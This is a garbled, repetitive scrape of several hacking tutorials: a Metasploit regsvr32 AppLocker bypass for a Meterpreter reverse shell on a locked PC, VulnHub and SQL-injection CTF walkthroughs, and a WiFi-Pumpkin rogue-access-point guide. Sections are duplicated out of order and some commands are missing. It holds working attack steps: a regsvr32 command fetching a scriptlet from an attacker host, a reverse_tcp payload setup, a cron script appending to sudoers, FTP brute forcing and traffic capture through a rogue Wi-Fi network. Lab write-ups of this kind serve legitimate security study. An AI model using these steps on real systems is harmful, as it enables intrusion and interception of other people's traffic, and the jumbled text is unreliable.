Today we will discover how to take Meterpreter session of a pc in a network which is switched on but is locked.
Next, we run metasploit on our own pc. $msfconsole
Regsvr32 /s /n /u /i:http://192.168.0.106:8080/nKCCncmdb.sct scrobj.dll
[size=small]netdiscover
1
netdiscover[/size]
Our target is 192.168.1.103. Scan it with nmap.
[size=small]nmap -p- -A 192.168.1.103
1
nmap -p- -A 192.168.1.103[/size]
A WordPress website opens. I explored this lot and tried to exploit it but it was useless. So I simply opened our target in the browser at its by-default port i.e. 80. The following page opens.
Then I explored the smb port.
[size=small]smbclient -L 192.168.0.103
1
smbclient -L 192.168.0.103[/size]
When it asks for a password then just hit enter without entering a password.
It just told us that backdoor is currently closed. So then I traversed telnet.
[size=small]telnet 192.168.0.103
1
telnet 192.168.0.103[/size]
Now check the TCP stream of every packet. In of it, you will find an email sent from Eric to Veronica, telling her to download a certain antivirus.
[size=small]nmap -p- 192.168.0.103
1
nmap -p- 192.168.0.103[/size]
[size=small]ftp 192.168.0.103
1
ftp 192.168.0.103[/size]
[size=small]dir
1
dir[/size]
[size=small]get .notes
exit
1
2
get .notes
exit[/size]
[size=small]cat .notes
1
cat .notes[/size]
[size=small]ftp 192.168.0.103
dir
binary
get eg-01.cap
get email-from-billy.eml
1
2
3
4
5
ftp 192.168.0.103
dir
binary
get eg-01.cap
get email-from-billy.eml[/size]
Now if you again scan it with nmap.
[size=small]nmap -p- -A 192.168.0.103
1
nmap -p- -A 192.168.0.103[/size]
Then type the following command:
I was pretty lost here so decided to take some help from Mr Goblin (https://g0blin.co.uk/billy-madison-1-vulnhub-writeup/) and so type the following set of commands:
[size=small]touch /tmp/test
/usr/local/share/sgml/donpcgd /tmp/test /etc/cron.hourly/test
echo -e '#!/bin/bash\necho "eric ALL=(ALL) NOPASSWORD:ALL" >> /etc/sudoers' > /etc/cron.hourly/test
chmod +x /etc/cron.hourly/test
cat /etc/chron.hourly/test
1
2
3
4
5
touch /tmp/test
/usr/local/share/sgml/donpcgd /tmp/test /etc/cron.hourly/test
echo -e '#!/bin/bash\necho "eric ALL=(ALL) NOPASSWORD:ALL" >> /etc/sudoers' > /etc/cron.hourly/test
chmod +x /etc/cron.hourly/test
cat /etc/chron.hourly/test[/size]
[size=small]ls
1
ls[/size]
[size=small]cd /PRIVATE
ls
1
2
cd /PRIVATE
ls[/size]
[size=small]cat hint.txt
1
cat hint.txt[/size]
[size=small]cp BowelMovement /var/www/html
1
cp BowelMovement /var/www/html[/size]
And then I created a dictionary file using cewl and that link.
[size=small]cewl --depth 0 https://en.wikipedia.org/wiki/Billy_Madison > /root/Desktop/billt.txt
1
cewl --depth 0 https://en.wikipedia.org/wiki/Billy_Madison > /root/Desktop/billt.txt[/size]
[size=small]unzip secret.zip
1
unzip secret.zip[/size]
[size=small]cat THE-END.txt
cat Billy_Madison12th_Grade_Fimal_Project.doc
1
2
cat THE-END.txt
cat Billy_Madison12th_Grade_Fimal_Project.doc[/size]
Finally! We have solved the CTF. Enjoy!
Our target is 192.168.1.8.
The only port we found open was 80. Next, we fire up the Nikto.
Through nikto we discovered two directories : /admin/ and /images/.
Opening it on the browser we found that it was an e-commerce site as hinted by the author. We checked every tab but found nothing except in the blog tab.
In the blog tab, when you will hover your mouse arrow over the admin in the phrase . It will change from arrow to a hand that indicates that means it will open as it a click on.
Copy the cooky string and paste it in a simple text file.
Then start the SQL attack by typing the following command in the terminal of Kali.
Here,
/root/Desktop/sea.txt is the path of the text file in which we had saved the cookies.
This command will give us the name of the following database.
Out of these databases, we will dump the tables of seattle with the following command :
And with that, we will have all the name of the tables as you can see in the following image.
Next, we will dump the columns of the tables with the following command :
The execution of the above command will show the table names as follows:
Now in the table names, there is a table password. Now we already have the username of the admin and we just want the password. So now we will dump the contents of the password table.
And voila! We have the password i.e. Assasin1
Now in the browser, go to my account tab and there you will find a login portal. Give the username and password of the admin and click on Login.
And you will be logged in as the admin.
[size=small]cd Desktop WiFi-Pumpkin
./installer.sh --install
1
2
cd Desktop WiFi-Pumpkin
./installer.sh --install[/size]
Thereafter, we search for regsvr32_applocker_bypass_server and use the exploit followed by setting the payload, lhost, lport and run exploit.
use exploit/windows/misc/regsvr32_applocker_bypass_server
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.106
set lport 4444
exploit
Regsvr32 /s /n /u /i:http://192.168.0.106:8080/nKCCncmdb.sct scrobj.dll
Download the lab from https://www.vulnhub.com/entry/billy-madison-11,161/
Walkthrough
[size=small]netdiscover
1
netdiscover[/size]
[size=small]nmap -p- -A 192.168.1.103
1
nmap -p- -A 192.168.1.103[/size]
Okay! So from nmap we have discovered the port : 22, 23, 69, 80, 137, 138, 139, 445, 2525. So, I opened our target in the browser at port 69.
Then I explored the smb port.
[size=small]smbclient -L 192.168.0.103
1
smbclient -L 192.168.0.103[/size]
When it asks for a password then just hit enter without entering a password.
It just told us that backdoor is currently closed. So then I traversed telnet.
[size=small]telnet 192.168.0.103
1
telnet 192.168.0.103[/size]
By decrypting it, it comes to be as exschmenuating. Now this could be a directory so I opened it in the browser
Now in the browser, it opened a webpage which gave us a few hints for moving forward. Through conclusion, we now know that there is a .cap file and that name and is derived from rockyou.txt.
Now there are many names in rockyou.txt but we only need the ones with to have Veronica in it and for that use the following command:
Execution of the above command will create a text file with names Veronica in it. Now use this text file and find the file which had Veronica in it through DirBuster. And for this, open DirBuster and give the URL in the Target URL text box and then give the path of the text file you just created using grep command. Give the directory name in Dir to start with the text box and then give cap as the file extension.
As a result, it will show you 012987veronica.cap file.
Open it in the browser. It will ask you to download it, go ahead with it.
In another TCP stream, you will find that Veronica has replied to Eric, saying that to share the link through FTP server along with a youtube link.
Again in a TCP stream of a packet, you will find that Eric has told her about his username and password.
Then to check I fired up the nmap again.
[size=small]nmap -p- 192.168.0.103
1
nmap -p- 192.168.0.103[/size]
[size=small]ftp 192.168.0.103
1
ftp 192.168.0.103[/size]
[size=small]dir
1
dir[/size]
There is a file named .notes. I decided to read it but before doing so I had to download it, therefore, type :
[size=small]get .notes
exit
1
2
get .notes
exit[/size]
Now that notes file is downloaded, type the following command in the terminal of kali to read it:
[size=small]cat .notes
1
cat .notes[/size]
There was a message in the notes by eric. Now if you remember the conversation of Veronica and eric then you would know that there are two users on the ftp server. the second one is Veronica. Naturally, I decided to use hydra to apply the brute force attack on FTP to get the username and password using the same dictionary file which I had created with grep.
And yes!! We have the password along with username i.e. veronica and [email protected]
[size=small]ftp 192.168.0.103
dir
binary
get eg-01.cap
get email-from-billy.eml
1
2
3
4
5
ftp 192.168.0.103
dir
binary
get eg-01.cap
get email-from-billy.eml[/size]
Further, I used aircrack-ng to monitor eg-01.cap to because the email that was sent through the swaks mentioned something about the wifi password.
And with aircrack-ng, we found the password of wireless i.e. triscuit*.
[size=small]nmap -p- -A 192.168.0.103
1
nmap -p- -A 192.168.0.103[/size]
And then give the password triscuit*. Once I was logged in I checked it Linux version with the following command but it was not exploitable.Then typed following command to see what it has to offer :
ls
There I found a text file so I decided to read it.
cat why-1974.txt
I was pretty lost here so decided to take some help from Mr Goblin (https://g0blin.co.uk/billy-madison-1-vulnhub-writeup/) and so type the following set of commands:
[size=small]touch /tmp/test
/usr/local/share/sgml/donpcgd /tmp/test /etc/cron.hourly/test
echo -e '#!/bin/bash\necho "eric ALL=(ALL) NOPASSWORD:ALL" >> /etc/sudoers' > /etc/cron.hourly/test
chmod +x /etc/cron.hourly/test
cat /etc/chron.hourly/test
1
2
3
4
5
touch /tmp/test
/usr/local/share/sgml/donpcgd /tmp/test /etc/cron.hourly/test
echo -e '#!/bin/bash\necho "eric ALL=(ALL) NOPASSWORD:ALL" >> /etc/sudoers' > /etc/cron.hourly/test
chmod +x /etc/cron.hourly/test
cat /etc/chron.hourly/test[/size]
[size=small]ls
1
ls[/size]
I decided to read /PRIVATE file.
[size=small]cd /PRIVATE
ls
1
2
cd /PRIVATE
ls[/size]
Here, I found hint.txt and BowelMovement files. First I opened hint.txt.
[size=small]cat hint.txt
1
cat hint.txt[/size]
In this file, he is talking about the BowelMovement file and about its password which is the link given. So I copied the BowelMovement file.
[size=small]cp BowelMovement /var/www/html
1
cp BowelMovement /var/www/html[/size]
[size=small]cewl --depth 0 https://en.wikipedia.org/wiki/Billy_Madison > /root/Desktop/billt.txt
1
cewl --depth 0 https://en.wikipedia.org/wiki/Billy_Madison > /root/Desktop/billt.txt[/size]
By brute force, you will find the correct password from this dictionary file. Using that password open the movement file that you have downloaded. BowelM.
And then open the same in the terminal of kali and type :
ls
There is a file called secret.zip, unzip it.
[size=small]unzip secret.zip
1
unzip secret.zip[/size]
In the zipped folder, there were two files. I decided to read them both.
[size=small]cat THE-END.txt
cat Billy_Madison12th_Grade_Fimal_Project.doc
1
2
cat THE-END.txt
cat Billy_Madison12th_Grade_Fimal_Project.doc[/size]
This is another article for Boot2Root series in CTF challenges. This lab is prepared by HollyGracefull. This is just a preview of the original lab which stimulates the E-commerce web application which contains common security errors. Current vulnerabilities are listed below :
- SQL Injection (Error-based)
- SQL Injection (Blind)
- Reflected Cross-Site Scripting
- Stored Cross-Site Scripting
- Insecure Direct-Object Reference
- Username Enumeration
- Path Traversal
- Exposed phpinfo()
- Exposed Administrative Interface
- Weak Admin Credentials
WalkThrough
netdiscover
The only port we found open was 80. Next, we fire up the Nikto.
Through nikto we discovered two directories : /admin/ and /images/.
Opening it on the browser we found that it was an e-commerce site as hinted by the author. We checked every tab but found nothing except in the blog tab.
In the blog tab, when you will hover your mouse arrow over the admin in the phrase . It will change from arrow to a hand that indicates that means it will open as it a click on.
Copy the cooky string and paste it in a simple text file.
Then start the SQL attack by typing the following command in the terminal of Kali.
Here,
/root/Desktop/sea.txt is the path of the text file in which we had saved the cookies.
This command will give us the name of the following database.
Out of these databases, we will dump the tables of seattle with the following command :
And with that, we will have all the name of the tables as you can see in the following image.
Next, we will dump the columns of the tables with the following command :
The execution of the above command will show the table names as follows:
Now in the table names, there is a table password. Now we already have the username of the admin and we just want the password. So now we will dump the contents of the password table.
And voila! We have the password i.e. Assasin1
Now in the browser, go to my account tab and there you will find a login portal. Give the username and password of the admin and click on Login.
And you will be logged in as the admin.
This CTF does contain any flag. All that required was to have admin access and yooohoooo!! We have that.
WiFi-Pumpkin is an open source security tool that provides the Rogue access point to Man-In-The-Middle and network attacks. Using WiFi Pumpkin, one can create a wifi network that captures all the requests made within the network by any device that connects to the network.
First of all, u need to download WiFi Pumpkin and install it in your Kali Linux. To download WiFi Pumpkin, go to https://github.com/P0cL4bs/WiFi-Pumpkin and click on Clone or Download. Thereafter, copy the URL to the clipboard and open the terminal. Type in:-
Next, go to the directory of WiFi Pumpkin on the terminal. For eg., if the repo is downloaded to the Desktop, type:
[size=small]cd Desktop WiFi-Pumpkin
./installer.sh --install
1
2
cd Desktop WiFi-Pumpkin
./installer.sh --install[/size]
Thereafter, run wifi-pumpkin:
This will open the GUI version of WiFi-Pumpkin. Now select the network adapter and change the SSID from PumpAP and rename it as desired.
Thereafter click on the Start button. This will create a new wifi-zone with the name entered in the SSID field.
Now as soon as any device connects to this wifi network, its details will be shown in the table at the right. Select any target device from the list of connected device/s and select Active Driftnet from the Tools menu.
